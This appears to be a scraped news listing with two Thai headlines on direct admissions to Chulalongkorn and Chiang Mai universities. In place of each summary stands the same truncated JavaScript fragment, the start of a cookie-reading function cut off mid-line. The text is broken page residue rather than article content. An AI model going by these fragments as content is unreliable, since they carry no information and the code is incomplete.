รับตรงร่วมกัน จุฬาฯ รวม 15 คณะ

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

รับตรงร่วมกัน ม.เชียงใหม่ 26 คณะ

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…